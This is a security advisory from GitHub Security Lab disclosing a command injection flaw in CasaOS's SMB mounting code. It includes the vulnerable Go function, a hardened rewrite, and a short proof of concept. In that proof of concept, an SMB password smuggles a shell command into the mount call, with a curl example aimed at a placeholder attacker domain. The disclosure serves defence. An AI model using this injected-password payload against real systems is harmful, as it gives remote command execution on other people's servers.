Coordinated Disclosure Timeline

Summary

If an authenticated CasaOS user is able to successfully connect to an SMB server they control, they are able to execute arbitrary commands.

Product

CasaOS

Tested Version

v3.7-1

Details

Issue: command injection in PostSambaConnectionsCreate (GHSL-2022-119)

The MountSmaba function is called by PostSambaConnectionsCreate with none of the inputs sanitized, and it concatenates them directly into a shell command string. The parameters are used to confirm that an SMB share can be authenticated, but if malicious parameters are valid on the SMB end, command injection is possible.

func (s *connectionsStruct) MountSmaba(username, host, directory, port, mountPoint, password string) string {
	str := command2.ExecResultStr("source " + config.AppInfo.ShellPath + "/helper.sh ;MountCIFS " + username + " " + host + " " + directory + " " + port + " " + mountPoint + " " + password)
	return str
}
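
A hardened form of the call above, as an added example that is not CasaOS's actual fix and not code from this advisory: the script text is a constant and each user-supplied value is passed as a separate positional parameter, so the shell never parses it as code. The names MountSamba, mountArgv, validateTarget and hostRe, the host allow-list, and the use of bash to source helper.sh are assumptions.

```go
package main

import (
	"fmt"
	"os/exec"
	"regexp"
	"strconv"
)

// Assumed allow-list for the host field: hostname or IPv4 characters only.
var hostRe = regexp.MustCompile(`^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$`)

// validateTarget rejects host and port values that cannot be a network endpoint.
func validateTarget(host, port string) error {
	if !hostRe.MatchString(host) {
		return fmt.Errorf("invalid host %q", host)
	}
	if n, err := strconv.Atoi(port); err != nil || n < 1 || n > 65535 {
		return fmt.Errorf("invalid port %q", port)
	}
	return nil
}

// mountArgv builds the argument vector. The script is a constant; the shell path
// becomes $0 and every user-supplied value is its own positional parameter
// ($1..$6), so metacharacters such as ';' or '$' in a value stay literal data.
func mountArgv(shellPath, username, host, directory, port, mountPoint, password string) []string {
	const script = `source "$0/helper.sh"; MountCIFS "$@"`
	return []string{"bash", "-c", script, shellPath,
		username, host, directory, port, mountPoint, password}
}

// MountSamba is a hypothetical hardened replacement for MountSmaba.
func MountSamba(shellPath, username, host, directory, port, mountPoint, password string) (string, error) {
	if err := validateTarget(host, port); err != nil {
		return "", err
	}
	argv := mountArgv(shellPath, username, host, directory, port, mountPoint, password)
	out, err := exec.Command(argv[0], argv[1:]...).CombinedOutput()
	return string(out), err
}

func main() {
	fmt.Printf("%q\n", mountArgv("/casaOS/shell", "u", "nas.example", "share", "445", "/mnt/x", "pw;id"))
}
```

This closes the injection only in the Go layer; MountCIFS in helper.sh, which this page does not show, must also quote its parameters wherever it uses them.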

Impact

This issue may lead to Command Injection.

Resources

This proof of concept uses the password parameter.

  1. Create an SMB share with any path, any share name, and any username.
  2. Set the password of the user to be ;CMD=$'\x20arg1';command$CMD

    For example, if I wanted to access a website, I could do ;CMD=$'\x20attackerdomain.com';curl$CMD

  3. Go to Files->Location->Connect Network Storage and enter the share path, username, and password; your command should execute.

CVE

Credit

This issue was discovered and reported by GHSL team member @Kwstubbs (Kevin Stubbings) and found with the help of the go/command-injection CodeQL query.

Contact

You can contact the GHSL team at securitylab@github.com. Please include a reference to GHSL-2022-119 in any communication regarding this issue.